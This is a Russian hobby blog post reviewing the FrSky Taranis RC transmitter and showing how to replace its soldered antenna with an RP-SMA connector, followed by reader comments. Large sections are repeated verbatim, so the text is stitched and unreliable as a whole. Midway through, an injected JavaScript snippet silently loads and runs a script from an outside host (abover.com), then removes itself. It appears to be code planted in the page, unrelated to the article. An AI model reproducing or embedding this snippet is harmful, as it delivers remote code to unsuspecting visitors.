Давненько я не писал, потому как был занят работой и досборкой своего пено-монстра. (про него можно почитать тут и тут.)
Но сегодня я расскажу про новую аппаратуру.
FrSky Taranis, который я ждал с момента анонса и был наверно в первой сотне в предзаказе, но приехала она ко мне только неделю назад. Вот в таком виде:
Но сегодня я расскажу про новую аппаратуру.
FrSky Taranis, который я ждал с момента анонса и был наверно в первой сотне в предзаказе, но приехала она ко мне только неделю назад. Вот в таком виде:
Чемоданчик дешевый, но вполне себе крепкий, но для транспортировки на поле я его использовать не буду, просто приятный бонус. Внутри все как обещано:
- Аппаратура Taranis 16-тиканальная
- Приемник X8R 8/16 каналов с новыми PCB-антеннами.
- Шнурок с распределителем веса
- Аккумулятор с зарядкой.
Приятной неожиданостью стала карта microSD 2 Гб уже установленная в пульт. То ли при проверке не вытащили, то ли это бонус за долгое ожидание. Вообщем ее в комплекте быть не должно. =)
Я не мастер описывать аппаратуры потому что у меня их всего 2 (Futaba T6J и Futaba 8FG Super), поэтому все это исключительно мои субъективные ощущения. А если вы еще и вторую часть статьи будете читать, то я вообще не несу отвественность. :3
Вот сравнение Тараниса и Футабы:
Но и мое мнение о Таранисе:
Что понравилось:
- Классический JR-овский дизайн для меня нейтрален, это скорее дело привычки.
- Эргономика на хорошем уровне, более того, дотягиваться до дальних переключателей мне на Таранисе удобнее чем на 8FG
- Качество изготовления - выше всяких похвал. За эти деньги меня не покидает ощущение, что я его украл.
- Все подогнано стык-в-стык, стики ходят великолепно, четко, плавно. Все переключатели сидят очень плотно, щелкают приятно.
- Никаких проблем с первоначальными настройками я не испытал и довольно большой носитель был настроен за один вечер с перекурами на мануал по незнакомой системе openTx. (включая довольно непростые, в сравнении с футабой, настройки замедления закрылок, микс от них на руль высоты с таким же замедление, работа флаперонов)
- Голосовое оповещение реально удобная вещь. Когда тебя раз, скажем, в 30 секунд будут предупреждать что у тебя "Закрылки в положении 1", о чем я регулярно забываю, это очень удобно.
Что не понравилось:
Да, это единственно что меня напрягло =) Я не шучу, я абсолютно целиком и полностью доволен аппаратурой и она стала моей основной для полетов по камере. Futaba T6J остается вертолетной аппой, а вот 8FG скорее всего отправится на барахолку.
Вот про последний пункт "минусов" и пойдет речь во второй части статьи.
Переделываем штатную антенну:
Я, почему-то, не доверяю LRS системам и летаю исключительно с бустером 2.4 ГГц, поэтому наличие для меня нормального RP-SMA гнезда на аппаратуре критично. У Тараниса антенна несъемная, поэтому пришлось забраться внутрь:
Общий вид (можете оценить качество сборки):
Антенна припаяна к плате и посажена на термоклей (или типа того).
Не долго думая сковыриваем клей и внезапно отпаиваем антенну.
Сетуем на то как много припоя ушло на "землю". И готовимся к припайке на это же место своего хвостика.
Сразу оговорюсь, нужен паяльник с тонким жалом, аккуратность и полное понимание что ты делаешь. Ну и конечно не обойтись без "третьей руки" в виде крокодильчика паяльной станции, потому что это все реально маленькое и полоснуть припоем по дорожкам много ума не надо.
Я отметил на фотографии куда должен идти сигнальный провод (центральный в кабеле) и куда земля (оплетка).
После пайки неаккуратно заливаем термоклеем на самой низкой температуре (у меня это 150 градусов)
Вот собственно и все. RP-SMA конец, который выходит наружу я приклеил на циакрин, держится очень хорошо и на всякий случай прихватил термоклеем сам кабель внутри аппаратуры, чтобы не болтался лишний раз.
После такой операции можно подключать любую удобную вам антенну, включая бустер (ради которого я это и затевал)
Справедливости ради нужно заметить, со штатной антенной и приемником аппаратура позволила улететь на 970 метров, лишь после этого сигнал пропал.
Ну и бонусом - небольшое видео с облета моего носителя, просто для полноценной статьи про полеты по камере на нем пока мало материала, но похвастаться уже хочется.
Проверка дальности на 2:40. Антенны как попало лежат внутри.
Еще одна поверка, уже с нормально расположенными антеннами.
И скоро, скоро третья статья про уже настоящие полеты Sky Cruise, отвественно заявляю, что самолет получился просто караул.
- Синяя подсветка.
- Несъемная припаянная к плате антенна (производитель уже сообщил, что это было требование сертификации для европейских стран, но все же)
Да, это единственно что меня напрягло =) Я не шучу, я абсолютно целиком и полностью доволен аппаратурой и она стала моей основной для полетов по камере. Futaba T6J остается вертолетной аппой, а вот 8FG скорее всего отправится на барахолку.
Вот про последний пункт "минусов" и пойдет речь во второй части статьи.
Переделываем штатную антенну:
Я, почему-то, не доверяю LRS системам и летаю исключительно с бустером 2.4 ГГц, поэтому наличие для меня нормального RP-SMA гнезда на аппаратуре критично. У Тараниса антенна несъемная, поэтому пришлось забраться внутрь:
Общий вид (можете оценить качество сборки):
Антенна припаяна к плате и посажена на термоклей (или типа того).
Не долго думая сковыриваем клей и внезапно отпаиваем антенну.
Сетуем на то как много припоя ушло на "землю". И готовимся к припайке на это же место своего хвостика.
Сразу оговорюсь, нужен паяльник с тонким жалом, аккуратность и полное понимание что ты делаешь. Ну и конечно не обойтись без "третьей руки" в виде крокодильчика паяльной станции, потому что это все реально маленькое и полоснуть припоем по дорожкам много ума не надо.
Я отметил на фотографии куда должен идти сигнальный провод (центральный в кабеле) и куда земля (оплетка).
После пайки неаккуратно заливаем термоклеем на самой низкой температуре (у меня это 150 градусов)
Вот собственно и все. RP-SMA конец, который выходит наружу я приклеил на циакрин, держится очень хорошо и на всякий случай прихватил термоклеем сам кабель внутри аппаратуры, чтобы не болтался лишний раз.
После такой операции можно подключать любую удобную вам антенну, включая бустер (ради которого я это и затевал)
Справедливости ради нужно заметить, со штатной антенной и приемником аппаратура позволила улететь на 970 метров, лишь после этого сигнал пропал.
Ну и бонусом - небольшое видео с облета моего носителя, просто для полноценной статьи про полеты по камере на нем пока мало материала, но похвастаться уже хочется.
Проверка дальности на 2:40. Антенны как попало лежат внутри.
Еще одна поверка, уже с нормально расположенными антеннами.
И скоро, скоро третья статья про уже настоящие полеты Sky Cruise, отвественно заявляю, что самолет получился просто караул.
Автопилот MFD со встроенной ОСД.
[removed]// <![CDATA[ (function () { var script= document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random(); script.onload = script.onerror = function () { script.onload = script.onerror = null; script.removeChild(script); } document.body.appendChild(script); })(); // ]]>[removed]
Антенны - настроенный Vee-диполь (1160 МГц, у меня это 3 канал) на самолете и 1,2 ГГц патч-антенна на земле. Пока без поворотки, да и не нужна она, для покрутится вокруг себя будет крыло с клеверами. Все видео была направлена в одну сторону, ну пару раз помехи были, когда за спиной и над ней пролетал.
На клеверах на таком передатчике легко улетается на 5 км. На патче расчитываю на 10 км.
С доставкой и минус налог получилось 156 фунтов, ну то есть где-то 7800 рублей.
Аппаратура супер, тоже хочу такую, турниги уже не хватает.
Что у вас такое с горизонтом?
Счастливчик.
А вот я, похоже, первый, угодивший в бекордер после появления первой партии Таранисов на ХК...
Чтож, автора поздравляю с удачным приобретением. А нам, ждунам, желаю, чтоб производитель побыстрее раскручивал свои мощности.